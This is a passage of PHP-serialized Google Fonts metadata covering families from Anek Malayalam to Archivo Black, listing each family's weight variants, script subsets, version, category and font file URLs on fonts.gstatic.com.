"family\";s:14:\"Anek Malayalam\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:9:\"malayalam\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:119:\"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUZu_HMr5PDO71Qs.ttf\";s:3:\"200\";s:119:\"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTURu-HMr5PDO71Qs.ttf\";s:3:\"300\";s:119:\"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUcW-HMr5PDO71Qs.ttf\";s:7:\"regular\";s:119:\"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUZu-HMr5PDO71Qs.ttf\";s:3:\"500\";s:119:\"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUam-HMr5PDO71Qs.ttf\";s:3:\"600\";s:119:\"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUUW5HMr5PDO71Qs.ttf\";s:3:\"700\";s:119:\"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTUXy5HMr5PDO71Qs.ttf\";s:3:\"800\";s:119:\"http://fonts.gstatic.com/s/anekmalayalam/v4/6qLjKZActRTs_mZAJUZWWkhke0nYa_vC8_Azq3-gP1SReZeOtqQuDVUTURu5HMr5PDO71Qs.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:62;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Anek Odia\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"oriya\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:107:\"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnmZf63mXZAtm_es.ttf\";s:3:\"200\";s:107:\"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnkZfq3mXZAtm_es.ttf\";s:3:\"300\";s:107:\"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnnHfq3mXZAtm_es.ttf\";s:7:\"regular\";s:107:\"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnmZfq3mXZAtm_es.ttf\";s:3:\"500\";s:107:\"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnmrfq3mXZAtm_es.ttf\";s:3:\"600\";s:107:\"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnlHea3mXZAtm_es.ttf\";s:3:\"700\";s:107:\"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnl-ea3mXZAtm_es.ttf\";s:3:\"800\";s:107:\"http://fonts.gstatic.com/s/anekodia/v4/TK3PWkoJARApz5UCd345tuevwwQX0CwsoYkAWgWYevAauivBUnkZea3mXZAtm_es.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:63;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Anek Tamil\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:110:\"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNQiZ6q4v4oegjOQ.ttf\";s:3:\"200\";s:110:\"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNwid6q4v4oegjOQ.ttf\";s:3:\"300\";s:110:\"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNHCd6q4v4oegjOQ.ttf\";s:7:\"regular\";s:110:\"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNQid6q4v4oegjOQ.ttf\";s:3:\"500\";s:110:\"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNcCd6q4v4oegjOQ.ttf\";s:3:\"600\";s:110:\"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNnCB6q4v4oegjOQ.ttf\";s:3:\"700\";s:110:\"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNpSB6q4v4oegjOQ.ttf\";s:3:\"800\";s:110:\"http://fonts.gstatic.com/s/anektamil/v4/XLYJIZH2bYJHGYtPGSbUB8JKTp-_9n55SsLHW0WZez6TjtkDu3uNwiB6q4v4oegjOQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:64;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Anek Telugu\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:6:\"telugu\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:112:\"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i13y-_oE2G2ep10_8.ttf\";s:3:\"200\";s:112:\"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i136--oE2G2ep10_8.ttf\";s:3:\"300\";s:112:\"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i133G-oE2G2ep10_8.ttf\";s:7:\"regular\";s:112:\"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i13y--oE2G2ep10_8.ttf\";s:3:\"500\";s:112:\"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i13x2-oE2G2ep10_8.ttf\";s:3:\"600\";s:112:\"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i13_G5oE2G2ep10_8.ttf\";s:3:\"700\";s:112:\"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i138i5oE2G2ep10_8.ttf\";s:3:\"800\";s:112:\"http://fonts.gstatic.com/s/anektelugu/v4/LhWLMVrUNvsddMtYGCx4FcVWOjlwE1WgXdoJ-5XHMl2DkooGK7i136-5oE2G2ep10_8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:65;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Angkor\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v28\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/angkor/v28/H4cmBXyAlsPdnlb-8iw-4Lqggw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:66;O:8:\"stdClass\":8:{s:6:\"family\";s:24:\"Annie Use Your Telescope\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:107:\"http://fonts.gstatic.com/s/annieuseyourtelescope/v18/daaLSS4tI2qYYl3Jq9s_Hu74xwktnlKxH6osGVGjlDfB3UUVZA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:67;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Anonymous Pro\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"greek\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/anonymouspro/v21/rP2Bp2a15UIB7Un-bOeISG3pLlw89CH98Ko.ttf\";s:6:\"italic\";s:86:\"http://fonts.gstatic.com/s/anonymouspro/v21/rP2fp2a15UIB7Un-bOeISG3pHl428AP44Kqr2Q.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/anonymouspro/v21/rP2cp2a15UIB7Un-bOeISG3pFuAT0CnW7KOywKo.ttf\";s:9:\"700italic\";s:90:\"http://fonts.gstatic.com/s/anonymouspro/v21/rP2ap2a15UIB7Un-bOeISG3pHl4OTCzc6IG30KqB9Q.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:68;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Antic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/antic/v19/TuGfUVB8XY5DRaZLodgzydtk.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:69;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Antic Didone\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/anticdidone/v16/RWmPoKKX6u8sp8fIWdnDKqDiqYsGBGBzCw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:70;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Antic Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/anticslab/v16/bWt97fPFfRzkCa9Jlp6IWcJWXW5p5Qo.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:71;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Anton\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/anton/v23/1Ptgg87LROyAm0K08i4gS7lu.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:72;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Antonio\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:87:\"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVxx8BtIY2DwSXlM.ttf\";s:3:\"200\";s:87:\"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVzx8RtIY2DwSXlM.ttf\";s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVwv8RtIY2DwSXlM.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVxx8RtIY2DwSXlM.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVxD8RtIY2DwSXlM.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVyv9htIY2DwSXlM.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/antonio/v11/gNMbW3NwSYq_9WD34ngK5F8vR8T0PVyW9htIY2DwSXlM.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:73;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Anybody\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:104:\"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4J12HPrsXD_nBPpQ.ttf\";s:3:\"200\";s:104:\"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JV2DPrsXD_nBPpQ.ttf\";s:3:\"300\";s:104:\"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JiWDPrsXD_nBPpQ.ttf\";s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4J12DPrsXD_nBPpQ.ttf\";s:3:\"500\";s:104:\"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4J5WDPrsXD_nBPpQ.ttf\";s:3:\"600\";s:104:\"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JCWfPrsXD_nBPpQ.ttf\";s:3:\"700\";s:104:\"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JMGfPrsXD_nBPpQ.ttf\";s:3:\"800\";s:104:\"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JV2fPrsXD_nBPpQ.ttf\";s:3:\"900\";s:104:\"http://fonts.gstatic.com/s/anybody/v4/VuJbdNvK2Ib2ppdWYq311GH32hxIv0sd5grncSUi2F_Wim4JfmfPrsXD_nBPpQ.ttf\";s:9:\"100italic\";s:106:\"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyMn7M_H3HVfpcHY.ttf\";s:9:\"200italic\";s:106:\"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyOn7c_H3HVfpcHY.ttf\";s:9:\"300italic\";s:106:\"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyN57c_H3HVfpcHY.ttf\";s:6:\"italic\";s:106:\"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyMn7c_H3HVfpcHY.ttf\";s:9:\"500italic\";s:106:\"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyMV7c_H3HVfpcHY.ttf\";s:9:\"600italic\";s:106:\"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyP56s_H3HVfpcHY.ttf\";s:9:\"700italic\";s:106:\"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyPA6s_H3HVfpcHY.ttf\";s:9:\"800italic\";s:106:\"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyOn6s_H3HVfpcHY.ttf\";s:9:\"900italic\";s:106:\"http://fonts.gstatic.com/s/anybody/v4/VuJddNvK2Ib2ppdWSKTHN4GOiYrmuF7VpPiuQ9r6sTRMJGkcHyOO6s_H3HVfpcHY.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:74;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Arapey\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/arapey/v16/-W__XJn-UDDA2RC6Z9AcZkIzeg.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/arapey/v16/-W_9XJn-UDDA2RCKZdoYREcjeo0k.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:75;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Arbutus\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/arbutus/v24/NaPYcZ7dG_5J3poob9JtryO8fMU.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:76;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Arbutus Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/arbutusslab/v16/oY1Z8e7OuLXkJGbXtr5ba7ZVa68dJlaFAQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:77;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Architects Daughter\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/architectsdaughter/v18/KtkxAKiDZI_td1Lkx62xHZHDtgO_Y-bvfY5q4szgE-Q.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:78;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Archivo\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:105:\"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTNDJp8B1oJ0vyVQ.ttf\";s:3:\"200\";s:105:\"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTtDNp8B1oJ0vyVQ.ttf\";s:3:\"300\";s:105:\"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTajNp8B1oJ0vyVQ.ttf\";s:7:\"regular\";s:105:\"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTNDNp8B1oJ0vyVQ.ttf\";s:3:\"500\";s:105:\"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTBjNp8B1oJ0vyVQ.ttf\";s:3:\"600\";s:105:\"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTT6jRp8B1oJ0vyVQ.ttf\";s:3:\"700\";s:105:\"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTT0zRp8B1oJ0vyVQ.ttf\";s:3:\"800\";s:105:\"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTtDRp8B1oJ0vyVQ.ttf\";s:3:\"900\";s:105:\"http://fonts.gstatic.com/s/archivo/v18/k3k6o8UDI-1M0wlSV9XAw6lQkqWY8Q82sJaRE-NWIDdgffTTnTRp8B1oJ0vyVQ.ttf\";s:9:\"100italic\";s:107:\"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HCBshdsBU7iVdxQ.ttf\";s:9:\"200italic\";s:107:\"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HABsxdsBU7iVdxQ.ttf\";s:9:\"300italic\";s:107:\"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HDfsxdsBU7iVdxQ.ttf\";s:6:\"italic\";s:107:\"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HCBsxdsBU7iVdxQ.ttf\";s:9:\"500italic\";s:107:\"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HCzsxdsBU7iVdxQ.ttf\";s:9:\"600italic\";s:107:\"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HBftBdsBU7iVdxQ.ttf\";s:9:\"700italic\";s:107:\"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HBmtBdsBU7iVdxQ.ttf\";s:9:\"800italic\";s:107:\"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HABtBdsBU7iVdxQ.ttf\";s:9:\"900italic\";s:107:\"http://fonts.gstatic.com/s/archivo/v18/k3k8o8UDI-1M0wlSfdzyIEkpwTM29hr-8mTYIRyOSVz60_PG_HAotBdsBU7iVdxQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:79;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Archivo Black\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/archivoblack/v17/HTxqL289NzCGg4MzN6KJ7eW6OYuP_x7yx3A.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:80;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Archivo 